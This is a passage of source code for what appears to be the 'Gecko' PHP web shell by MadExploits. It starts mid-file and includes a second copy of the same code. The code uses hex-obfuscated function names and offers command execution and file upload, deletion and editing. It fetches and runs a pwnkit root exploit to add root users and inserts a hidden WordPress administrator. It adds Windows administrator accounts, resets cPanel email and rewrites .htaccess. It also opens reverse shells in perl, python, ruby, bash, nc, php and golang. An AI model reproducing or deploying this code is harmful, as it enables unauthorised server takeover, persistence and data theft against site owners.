. $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text')); 1161 | chmod($curFile, 0444); 1162 | $handler = ' 1163 | /dev/null 2>/dev/null &'); 1188 | success(); 1189 | } else { 1190 | failed(); 1191 | } 1192 | } 1193 | if (isset($_POST['gecko-up-submit'])) { 1194 | $namaFilenya = $_FILES['gecko-upload']['name']; 1195 | $tmpName = $_FILES['gecko-upload']['tmp_name']; 1196 | if ($fungsi[29]($tmpName, $fungsi[0]() . "/" . $namaFilenya)) { 1197 | success(); 1198 | } else { 1199 | failed(); 1200 | } 1201 | } 1202 | 1203 | if (isset($_GET['destroy'])) { 1204 | $DOC_ROOT = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"]; 1205 | $CurrentFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"])); 1206 | if ($fungsi[4]($DOC_ROOT)) { 1207 | $htaccess = ' 1208 | 1209 | Deny from all 1210 | 1211 | 1212 | Allow from all 1213 | 1214 | 1215 | Allow from all 1216 | '; 1217 | $put_htt = $fungsi[28]($DOC_ROOT . "/.htaccess", $htaccess); 1218 | if ($put_htt) { 1219 | success(); 1220 | } else { 1221 | failed(); 1222 | } 1223 | } else { 1224 | failed(); 1225 | } 1226 | } 1227 | 1228 | 1229 | if (isset($_POST['save-editor'])) { 1230 | $save = $fungsi[28]($fungsi[0]() . "/" . unx($_GET['f']), $_POST['code-editor']); 1231 | if ($save) { 1232 | success(); 1233 | } else { 1234 | failed(); 1235 | } 1236 | } 1237 | 1238 | if (isset($_GET['adminer'])) { 1239 | $URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70"; 1240 | if (!$fungsi[3]('adminer.php')) { 1241 | $fungsi[28]("adminer.php", $fungsi[11]($URL)); 1242 | echo ''; 1243 | } 1244 | } 1245 | 1246 | 1247 | if ($_GET['terminal'] == "root") { 1248 | if (!$fungsi[3]('pwnkit') && $fungsi[4]($fungsi[0]())) { 1249 | $fungsi[28]("pwnkit", $fungsi[11]("https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit")); 1250 | cmd('chmod +x pwnkit'); 1251 | echo cmd('./pwnkit "id" > .mad-root'); 1252 | echo ''; 1253 | } 1254 | } 1255 | 1256 | if (isset($_POST['submit-action'])) { 1257 | $items = $_POST['check']; 1258 | if ($_POST['gecko-select'] == "delete") { 1259 | foreach ($items as $it) { 1260 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1261 | $fd = $repl . "/" . $it; 1262 | if (is_dir($fd) || is_file($fd)) { 1263 | $rmdir = unlinkDir($fd); 1264 | $rmfile = $fungsi[24]($fd); 1265 | if ($rmdir || $rmfile) { 1266 | success(); 1267 | } else if ($rmdir && $rmfile) { 1268 | success(); 1269 | } else { 1270 | failed(); 1271 | } 1272 | } 1273 | } 1274 | } else if ($_POST['gecko-select'] == 'unzip') { 1275 | foreach ($items as $it) { 1276 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1277 | $fd = $repl . "/" . $it; 1278 | if (ExtractArchive($fd, $repl . '/') == true) { 1279 | success(); 1280 | } else { 1281 | failed(); 1282 | } 1283 | } 1284 | } else if ($_POST['gecko-select'] == 'zip') { 1285 | foreach ($items as $it) { 1286 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1287 | $fd = $repl . "/" . $it; 1288 | if ($fungsi[3]($fd)) { 1289 | compressToZip($fd, pathinfo($fd, PATHINFO_FILENAME) . ".zip"); 1290 | } 1291 | } 1292 | } 1293 | } 1294 | 1295 | if (isset($_POST['submit'])) { 1296 | if ($_POST['resetcp'] == true) { 1297 | $emailCp = $_POST['resetcp']; 1298 | $path0cp = dirname($_SERVER['DOCUMENT_ROOT']); 1299 | $pathcp = $path0cp . "/.cpanel/contactinfo"; 1300 | $contactinfo = ' 1301 | "email" : "' . $emailCp . '" 1302 | '; 1303 | if ($fungsi[3]($pathcp)) { 1304 | $fungsi[28]($pathcp, $contactinfo); 1305 | echo ''; 1306 | } else { 1307 | failed(); 1308 | } 1309 | } 1310 | if ($_POST['create_folder'] == true) { 1311 | $NamaFolder = $fungsi[12]($_POST['create_folder']); 1312 | if ($NamaFolder) { 1313 | success(); 1314 | } else { 1315 | failed(); 1316 | } 1317 | } else if ($_POST['create_file'] == true) { 1318 | $namaFile = $fungsi[13]($_POST['create_file']); 1319 | if ($namaFile) { 1320 | success(); 1321 | } else { 1322 | failed(); 1323 | } 1324 | } else if ($_POST['renameFile'] == true) { 1325 | $renameFile = $fungsi[15](unx($_GET['re']), $_POST['renameFile']); 1326 | if ($renameFile) { 1327 | success(); 1328 | } else { 1329 | failed(); 1330 | } 1331 | } else if ($_POST['chFile']) { 1332 | $chFiles = $fungsi[30](unx($_GET['ch']), $_POST['chFile']); 1333 | if ($chFiles) { 1334 | success(); 1335 | } else { 1336 | failed(); 1337 | } 1338 | } else if (isset($_POST['add-username']) && isset($_POST['add-password'])) { 1339 | if (!$fungsi[3]('pwnkit')) { 1340 | cmd('wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit'); 1341 | cmd('chmod +x pwnkit'); 1342 | cmd('./pwnkit "id" > .mad-root'); 1343 | echo ''; 1344 | } else if ($fungsi[3]('.mad-root')) { 1345 | $response = $fungsi[11]('.mad-root'); 1346 | $r_text = explode(" ", $response); 1347 | if ($r_text[0] == "uid=0(root)") { 1348 | $username = $_POST['add-username']; 1349 | $password = $_POST['add-password']; 1350 | cmd('./pwnkit "useradd ' . $username . ' ; echo -e "' . $password . '\n' . $password . '" | passwd ' . $username . '"'); 1351 | } else { 1352 | echo ''; 1353 | } 1354 | } 1355 | } else if ($_POST['lockfile'] == true) { 1356 | $flesName = $_POST['lockfile']; 1357 | $TmpNames = $fungsi[31](); 1358 | if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . remove_dot($flesName) . '-text')) { 1359 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file')); 1360 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler')); 1361 | } 1362 | mkdir($TmpNames . "/.sessions"); 1363 | cmd("cp $flesName " . $TmpNames . "/.sessions/." . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file')); 1364 | cmd("chmod 444 " . $flesName); 1365 | $handler = ' 1366 | /dev/null 2>/dev/null &'); 1391 | success(); 1392 | } else { 1393 | failed(); 1394 | } 1395 | } else if ($_POST['add-rdp'] == True) { 1396 | $userRDP = $_POST['add-rdp']; 1397 | $passRDP = $_POST['add-rdp-pass']; 1398 | if (stristr(PHP_OS, "WIN")) { 1399 | $procRDP = cmd("net user " . $userRDP . " " . $passRDP . " /add"); 1400 | if ($procRDP) { 1401 | cmd("net localgroup administrators " . $userRDP . " /add"); 1402 | success(); 1403 | } else { 1404 | failed(); 1405 | } 1406 | } else { 1407 | failed(); 1408 | } 1409 | } else if ($_POST['mail-from-smtp'] == True) { 1410 | $emailFrom = $_POST['mail-from-smtp']; 1411 | $emailTo = $_POST['mail-to-smtp']; 1412 | $emailSubject = $_POST['mailto-subject']; 1413 | $messageMail = $_POST['message-smtp']; 1414 | $headersMail = 'From: ' . $emailFrom . '' . "\r\n" . 1415 | 'Reply-To: ' . $emailFrom . '' . "\r\n" . 1416 | 'X-Mailer: PHP/' . phpversion(); 1417 | $procMailSmTp = mail($emailTo, $emailSubject, $messageMail, $headersMail); 1418 | if ($procMailSmTp) { 1419 | success(); 1420 | } else { 1421 | failed(); 1422 | } 1423 | } 1424 | } 1425 | 1426 | if ($_GET['response'] == "success") { 1427 | echo ""; 1434 | } else if ($_GET['response'] == "failed") { 1435 | echo ""; 1443 | } 1444 | 1445 | 1446 | function success() 1447 | { 1448 | echo ''; 1449 | } 1450 | function failed() 1451 | { 1452 | echo ''; 1453 | } 1454 | 1455 | function formatSize($bytes) 1456 | { 1457 | $types = array('B', 'KB', 'MB', 'GB', 'TB'); 1458 | for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); 1459 | return (round($bytes, 2) . " " . $types[$i]); 1460 | } 1461 | 1462 | 1463 | function hx($n) 1464 | { 1465 | $y = ''; 1466 | for ($i = 0; $i < strlen($n); $i++) { 1467 | $y .= dechex(ord($n[$i])); 1468 | } 1469 | return $y; 1470 | } 1471 | function unx($y) 1472 | { 1473 | $n = ''; 1474 | for ($i = 0; $i < strlen($y) - 1; $i += 2) { 1475 | $n .= chr(hexdec($y[$i] . $y[$i + 1])); 1476 | } 1477 | return $n; 1478 | } 1479 | 1480 | function suggest_exploit() 1481 | { 1482 | $uname = $GLOBALS['fungsi'][8](); 1483 | $xplod = explode(" ", $uname); 1484 | $xpld = explode("-", $xplod[2]); 1485 | $pl = explode(".", $xpld[0]); 1486 | return $pl[0] . "." . $pl[1] . "." . $pl[2]; 1487 | } 1488 | function s() 1489 | { 1490 | $d0mains = @$GLOBALS['fungsi'][7]("/etc/named.conf", false); 1491 | if (!$d0mains) { 1492 | $dom = "Cant Read [ /etc/named.conf ]"; 1493 | $GLOBALS["need_to_update_header"] = "true"; 1494 | } else { 1495 | $count = 0; 1496 | foreach ($d0mains as $d0main) { 1497 | if (@strstr($d0main, "zone")) { 1498 | preg_match_all('#zone "(.*)"#', $d0main, $domains); 1499 | flush(); 1500 | if (strlen(trim($domains[1][0])) > 2) { 1501 | flush(); 1502 | $count++; 1503 | } 1504 | } 1505 | } 1506 | $dom = "$count Domain"; 1507 | } 1508 | return $dom; 1509 | } 1510 | 1511 | function cmd($in, $re = false) 1512 | { 1513 | $out = ''; 1514 | try { 1515 | if ($re) $in = $in . " 2>&1"; 1516 | if (function_exists("\x65\x78\x65\x63")) { 1517 | @$GLOBALS['fungsi'][16]($in, $out); 1518 | $out = @join("\n", $out); 1519 | } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { 1520 | ob_start(); 1521 | @$GLOBALS['fungsi'][17]($in); 1522 | $out = ob_get_clean(); 1523 | } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { 1524 | ob_start(); 1525 | @$GLOBALS['fungsi'][18]($in); 1526 | $out = ob_get_clean(); 1527 | } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { 1528 | $out = $GLOBALS['fungsi'][19]($in); 1529 | } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { 1530 | if (is_resource($f = @$GLOBALS['fungsi'][20]($in, "r"))) { 1531 | $out = ""; 1532 | while (!@feof($f)) 1533 | $out .= fread($f, 1024); 1534 | $GLOBALS['fungsi'][21]($f); 1535 | } 1536 | } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { 1537 | $pipes = array(); 1538 | $process = @$GLOBALS['fungsi'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); 1539 | $out = @$GLOBALS['fungsi'][22]($pipes[1]); 1540 | } elseif (class_exists('COM')) { 1541 | $alfaWs = new COM('WScript.shell'); 1542 | $e = $alfaWs->$GLOBALS['fungsi'][16]('cmd.exe /c ' . $_POST['alfa1']); 1543 | $stdout = $e->StdOut(); 1544 | $out = $stdout->ReadAll(); 1545 | } 1546 | } catch (Exception $e) { 1547 | } 1548 | return $out; 1549 | } 1550 | 1551 | 1552 | function winpwd() 1553 | { 1554 | return str_replace("\\", "/", $GLOBALS['fungsi'][0]()); 1555 | } 1556 | 1557 | function compressToZip($sourceFile, $zipFilename) 1558 | { 1559 | $zip = new ZipArchive(); 1560 | 1561 | if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { 1562 | $zip->addFile($sourceFile, basename($sourceFile)); 1563 | $zip->close(); 1564 | success(); 1565 | } else { 1566 | failed(); 1567 | } 1568 | } 1569 | 1570 | function remove_slash($val) 1571 | { 1572 | $tex = str_replace("/", "", $val); 1573 | $tex1 = str_replace(":", "", $tex); 1574 | $tex2 = str_replace("_", "", $tex1); 1575 | $tex3 = str_replace(" ", "", $tex2); 1576 | $tex4 = str_replace(".", "", $tex3); 1577 | return $tex4; 1578 | } 1579 | 1580 | function unlinkDir($dir) 1581 | { 1582 | $dirs = array($dir); 1583 | $files = array(); 1584 | for ($i = 0;; $i++) { 1585 | if (isset($dirs[$i])) 1586 | $dir = $dirs[$i]; 1587 | else 1588 | break; 1589 | 1590 | if ($openDir = opendir($dir)) { 1591 | while ($readDir = @readdir($openDir)) { 1592 | if ($readDir != "." && $readDir != "..") { 1593 | 1594 | if ($GLOBALS['fungsi'][2]($dir . "/" . $readDir)) { 1595 | $dirs[] = $dir . "/" . $readDir; 1596 | } else { 1597 | 1598 | $files[] = $dir . "/" . $readDir; 1599 | } 1600 | } 1601 | } 1602 | } 1603 | } 1604 | 1605 | 1606 | 1607 | foreach ($files as $file) { 1608 | $GLOBALS['fungsi'][24]($file); 1609 | } 1610 | $dirs = array_reverse($dirs); 1611 | foreach ($dirs as $dir) { 1612 | $GLOBALS['fungsi'][25]($dir); 1613 | } 1614 | } 1615 | 1616 | function remove_dot($file) 1617 | { 1618 | $FILES = $file; 1619 | $pch = explode(".", $FILES); 1620 | return $pch[0]; 1621 | } 1622 | 1623 | 1624 | function windowsDriver() 1625 | { 1626 | $winArr = [ 1627 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z' 1628 | ]; 1629 | foreach ($winArr as $winNum => $winVal) { 1630 | if (is_dir($winVal . ":/")) { 1631 | echo "[ " . $winVal . " ]  "; 1632 | } 1633 | } 1634 | } 1635 | 1636 | function namaPanjang($value) 1637 | { 1638 | $namaNya = $value; 1639 | $extensi = pathinfo($value, PATHINFO_EXTENSION); 1640 | if (strlen($namaNya) > 30) { 1641 | return substr($namaNya, 0, 30) . "..."; 1642 | } else { 1643 | return $value; 1644 | } 1645 | } 1646 | 1647 | function extractArchive($archiveFilename, $extractPath) 1648 | { 1649 | $zip = new ZipArchive(); 1650 | 1651 | if ($zip->open($archiveFilename) === TRUE) { 1652 | $zip->extractTo($extractPath); 1653 | $zip->close(); 1654 | return true; 1655 | } else { 1656 | return false; 1657 | } 1658 | } 1659 | 1660 | function perms($file) 1661 | { 1662 | $perms = $GLOBALS['fungsi'][6]($file); 1663 | if (($perms & 0xC000) == 0xC000) { 1664 | // Socket 1665 | $info = 's'; 1666 | } elseif (($perms & 0xA000) == 0xA000) { 1667 | // Symbolic Link 1668 | $info = 'l'; 1669 | } elseif (($perms & 0x8000) == 0x8000) { 1670 | // Regular 1671 | $info = '-'; 1672 | } elseif (($perms & 0x6000) == 0x6000) { 1673 | // Block special 1674 | $info = 'b'; 1675 | } elseif (($perms & 0x4000) == 0x4000) { 1676 | // Directory 1677 | $info = 'd'; 1678 | } elseif (($perms & 0x2000) == 0x2000) { 1679 | // Character special 1680 | $info = 'c'; 1681 | } elseif (($perms & 0x1000) == 0x1000) { 1682 | // FIFO pipe 1683 | $info = 'p'; 1684 | } else { 1685 | // Unknown 1686 | $info = 'u'; 1687 | } 1688 | // Owner 1689 | $info .= (($perms & 0x0100) ? 'r' : '-'); 1690 | $info .= (($perms & 0x0080) ? 'w' : '-'); 1691 | $info .= (($perms & 0x0040) ? 1692 | (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); 1693 | // Group 1694 | $info .= (($perms & 0x0020) ? 'r' : '-'); 1695 | $info .= (($perms & 0x0010) ? 'w' : '-'); 1696 | $info .= (($perms & 0x0008) ? 1697 | (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); 1698 | 1699 | // World 1700 | $info .= (($perms & 0x0004) ? 'r' : '-'); 1701 | $info .= (($perms & 0x0002) ? 'w' : '-'); 1702 | $info .= (($perms & 0x0001) ? 1703 | (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); 1704 | return $info; 1705 | } 1706 | ?> 1707 | -------------------------------------------------------------------------------- /gecko-new.php: -------------------------------------------------------------------------------- 1 | 0 13 | '676c6f62', # gl ob => 1 14 | '69735f646972', # is_d ir => 2 15 | '69735f66696c65', # is_ file => 3 16 | '69735f7772697461626c65', # is_wr iteable => 4 17 | '69735f7265616461626c65', # is_re adble => 5 18 | '66696c657065726d73', # fileper ms => 6 19 | '66696c65', # f ile => 7 20 | '7068705f756e616d65', # php_unam e => 8 21 | '6765745f63757272656e745f75736572', # getc urrentuser => 9 22 | '68746d6c7370656369616c6368617273', # html special => 10 23 | '66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11 24 | '6d6b646972', # mk dir => 12 25 | '746f756368', # to uch => 13 26 | '6368646972', # ch dir => 14 27 | '72656e616d65', # ren ame => 15 28 | '65786563', # exe c => 16 29 | '7061737374687275', # pas sthru => 17 30 | '73797374656d', # syst em => 18 31 | '7368656c6c5f65786563', # sh ell_exec => 19 32 | '706f70656e', # p open => 20 33 | '70636c6f7365', # pcl ose => 21 34 | '73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22 35 | '70726f635f6f70656e', # p roc_open => 23 36 | '756e6c696e6b', # un link => 24 37 | '726d646972', # rmd ir => 25 38 | '666f70656e', # fop en => 26 39 | '66636c6f7365', # fcl ose => 27 40 | '66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28 41 | '6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29 42 | '63686d6f64', # ch mod => 30 43 | '7379735f6765745f74656d705f646972', # temp _dir => 31 44 | '6261736536345F6465636F6465', # => bas e6 4 _decode => 32 45 | '6261736536345F656E636F6465', # => ba se6 4_ encode => 33 46 | ]; 47 | $hitung_array = count($Array); 48 | for ($i = 0; $i < $hitung_array; $i++) { 49 | $fungsi[] = unx($Array[$i]); 50 | } 51 | 52 | if (isset($_GET['d'])) { 53 | $cdir = unx($_GET['d']); 54 | $fungsi[14]($cdir); 55 | } else { 56 | $cdir = $fungsi[0](); 57 | } 58 | 59 | function file_ext($file) 60 | { 61 | if (mime_content_type($file) == 'image/png' or mime_content_type($file) == 'image/jpeg') { 62 | return ''; 63 | } else if (mime_content_type($file) == 'application/x-httpd-php' or mime_content_type($file) == 'text/html') { 64 | return ''; 65 | } else if (mime_content_type($file) == 'text/javascript') { 66 | return ''; 67 | } else if (mime_content_type($file) == 'application/zip' or mime_content_type($file) == 'application/x-7z-compressed') { 68 | return ''; 69 | } else if (mime_content_type($file) == 'text/plain') { 70 | return ''; 71 | } else if (mime_content_type($file) == 'application/pdf') { 72 | return ''; 73 | } else { 74 | return ''; 75 | } 76 | } 77 | 78 | function download($file) 79 | { 80 | 81 | if (file_exists($file)) { 82 | header('Content-Description: File Transfer'); 83 | header('Content-Type: application/octet-stream'); 84 | header('Content-Disposition: attachment; filename=' . basename($file)); 85 | header('Content-Transfer-Encoding: binary'); 86 | header('Expires: 0'); 87 | header('Cache-Control: must-revalidate'); 88 | header('Pragma: public'); 89 | header('Content-Length: ' . filesize($file)); 90 | ob_clean(); 91 | flush(); 92 | readfile($file); 93 | exit; 94 | } 95 | } 96 | 97 | if ($_GET['don'] == true) { 98 | $FilesDon = download(unx($_GET['don'])); 99 | } 100 | ?> 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | Gecko [ <?= $_SERVER['SERVER_NAME']; ?> ] 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 540 | 541 | 542 | 543 |
544 |
    545 |
  •  
    • 546 |
  •  
    • 547 |
  •  : | :
    • 548 |
  •  
    • 549 |
  •  
    • 550 |
  •  
    • 551 |
  •  www.github.com/MadExploits
    • 552 |
    • 553 |
    554 |
  •  
    • 555 |
    556 |
557 |
558 |
559 | 577 |
578 | 579 | 584 | 585 |
586 | 590 |
591 | $val) { 598 | if ($val == '' && $id == 0) { 599 | echo '  / '; 600 | continue; 601 | } 602 | if ($val == '') continue; 603 | echo '' . $val . ' / ' . ''; 609 | } 610 | echo "[ HOME SHELL ] "; 611 | ?> 612 |
613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 660 | 661 | 662 | 663 | 664 | 665 | 666 |
NameSizePermissionAction
  ">[ DIR ] 632 | '; 634 | } elseif (!$fungsi[5]($fungsi[0]() . '/' . $_D)) { 635 | echo ''; 636 | } 637 | echo perms($fungsi[0]() . '/' . $_D); 638 | ?> 639 |  
   652 | '; 654 | } elseif (!is_readable($fungsi[0]() . '/' . $_F)) { 655 | echo ''; 656 | } 657 | echo perms($fungsi[0]() . '/' . $_F); 658 | ?> 659 |   
667 |
668 | 673 | 674 | 675 | 676 | 677 |
678 |
679 |
680 |

${this.title}

681 |
682 |
683 |
684 |
685 | 686 |
687 |   688 |
689 | 690 |
691 |
692 |
693 |
694 | 695 |
696 |
697 |
698 |

:: Cpanel Reset

699 |
700 |
701 |
702 |
703 | 704 | 705 |
706 |
707 |  Close 708 |
709 | 710 |
711 |
712 | 713 | 714 |
715 |
716 |
717 |

718 |
CREATE WORDPRESS ADMIN PASSWORD
719 |

720 |
721 |
722 |
723 |
724 | 725 | 726 |

727 | 728 |

729 | 730 |

731 | 732 |

733 |
734 |

735 | 736 |

737 | 738 |

739 |
740 |
741 |  Close 742 |
743 | 744 |
745 |
746 | 747 | 748 |
749 |
750 |
751 |

:: Backconnect

752 |
753 |
754 |
755 | 767 | 768 |

769 | 770 |
771 |  Close 772 |
773 | 774 |
775 |
776 | 777 | 778 |
779 |
780 |
781 |

:: PHP Mailer

782 |
783 |
784 |
785 |
786 | 787 |
788 | 789 |
790 |
791 | 792 |

793 | 794 |

795 | 796 |
797 |
798 |  Close 799 |
800 | 801 |
802 |
803 | 804 | 805 |
806 |
807 |
808 |

  Code Editor :

809 |
810 |
811 |
812 | 813 |
814 |   815 |
816 |
817 |
818 |
819 |
820 | 821 | 822 |
823 |
824 |
825 |
    826 |
  •  TERMINAL
    • 827 |
    • 828 |
829 |
830 |
831 | 836 |
837 |
    838 |
  • " autofocus>
    • 839 |
    • 840 |
841 |
842 |
843 |
844 |
845 | 846 | 847 |
848 |
849 |
850 |
    851 |
  •  AUTO ROOT
    • 852 |
    • 853 |
854 |
855 |
856 | 871 |
872 |
    873 |
  • " autofocus>
    • 874 |
    • 875 |
876 |
877 |
878 |
879 |
880 | 881 | 882 |
883 |
884 |
885 |

Rename :

886 |
887 |
888 |
889 | 890 |
891 |   892 |
893 |
894 |
895 |
896 |
897 |
898 | 899 | 900 |
901 |
902 |
903 |

Change Permission :

904 |
905 |
906 |
907 | 908 |
909 |   910 |
911 |
912 |
913 |
914 |
915 |
916 | 917 | 988 | 989 | 990 | 991 | connect_error) { 1004 | failed(); 1005 | die("Error Cug : " . $conn->connect_error); 1006 | } 1007 | 1008 | $sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ('$wp_user', '$wp_pass', 'MadExploits', '', '', NOW(), '', 0, 'MadExploits')"; 1009 | 1010 | $sqltakeuserid = "SELECT ID FROM wp_users WHERE user_login = '$wp_user'"; 1011 | 1012 | if ($conn->query($sql) === TRUE && $conn->query($sqltakeuserid)) { 1013 | $result = $conn->query($sqltakeuserid); 1014 | 1015 | if ($result->num_rows > 0) { 1016 | $row = $result->fetch_assoc(); 1017 | $user_id = $row["ID"]; 1018 | 1019 | $sqlusermeta = "INSERT INTO wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES ('', $user_id, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"; 1020 | 1021 | if ($conn->query($sqlusermeta) === TRUE) { 1022 | Success(); 1023 | } else { 1024 | echo "Error: " . $sqlusermeta . "\n" . $conn->error; 1025 | } 1026 | } else { 1027 | echo "User tidak ditemukan.\n"; 1028 | } 1029 | 1030 | Success(); 1031 | } else { 1032 | echo "Error: " . $sql . "\n" . $conn->error; 1033 | } 1034 | 1035 | $conn->close(); 1036 | } 1037 | 1038 | 1039 | 1040 | if (isset($_GET['unlockshell'])) { 1041 | if (cmd("killall -9 php") && cmd("pkill -9 php")) { 1042 | success(); 1043 | } else { 1044 | failed(); 1045 | } 1046 | } 1047 | 1048 | if (isset($_POST['submit-bc'])) { 1049 | $HostServer = $_POST['backconnect-host']; 1050 | $PortServer = $_POST['backconnect-port']; 1051 | if ($_POST['gecko-bc'] == "perl") { 1052 | echo cmd('perl -e \'use Socket;$i="' . $HostServer . '";$p=' . $PortServer . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' . $fungsi[16] . '("/bin/sh -i");};\''); 1053 | } else if ($_POST['gecko-bc'] == "python") { 1054 | echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''); 1055 | } else if ($_POST['gecko-bc'] == "ruby") { 1056 | echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;' . $fungsi[16] . ' sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\''); 1057 | } else if ($_POST['gecko-bc'] == "bash") { 1058 | echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); 1059 | } else if ($_POST['gecko-bc'] == "php") { 1060 | echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');' . $fungsi[16] . '("/bin/sh -i <&3 >&3 2>&3");\''); 1061 | } else if ($_POST['gecko-bc'] == "nc") { 1062 | echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . ' >/tmp/f'); 1063 | } else if ($_POST['gecko-bc'] == "sh") { 1064 | echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); 1065 | } else if ($_POST['gecko-bc'] == "xterm") { 1066 | echo cmd('xterm -display ' . $HostServer . ':' . $PortServer); 1067 | } else if ($_POST['gecko-bc'] == "golang") { 1068 | echo cmd('echo \'package main;import"os/' . $fungsi[16] . '";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'); 1069 | } 1070 | } 1071 | 1072 | 1073 | 1074 | if (isset($_GET['lockshell'])) { 1075 | $curFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"])); 1076 | $TmpNames = $fungsi[31](); 1077 | if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text'))) { 1078 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text')); 1079 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler')); 1080 | } 1081 | mkdir($TmpNames . "/.sessions"); 1082 | cmd("cp $curFile " . $TmpNames . "/.sessions/." . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text')); 1083 | chmod($curFile, 0444); 1084 | $handler = ' 1085 | /dev/null 2>/dev/null &'); 1110 | success(); 1111 | } else { 1112 | failed(); 1113 | } 1114 | } 1115 | if (isset($_POST['gecko-up-submit'])) { 1116 | $namaFilenya = $_FILES['gecko-upload']['name']; 1117 | $tmpName = $_FILES['gecko-upload']['tmp_name']; 1118 | if ($fungsi[29]($tmpName, $fungsi[0]() . "/" . $namaFilenya)) { 1119 | success(); 1120 | } else { 1121 | failed(); 1122 | } 1123 | } 1124 | 1125 | if (isset($_GET['destroy'])) { 1126 | $DOC_ROOT = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"]; 1127 | $CurrentFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"])); 1128 | if ($fungsi[4]($DOC_ROOT)) { 1129 | $htaccess = ' 1130 | 1131 | Deny from all 1132 | 1133 | 1134 | Allow from all 1135 | 1136 | 1137 | Allow from all 1138 | '; 1139 | 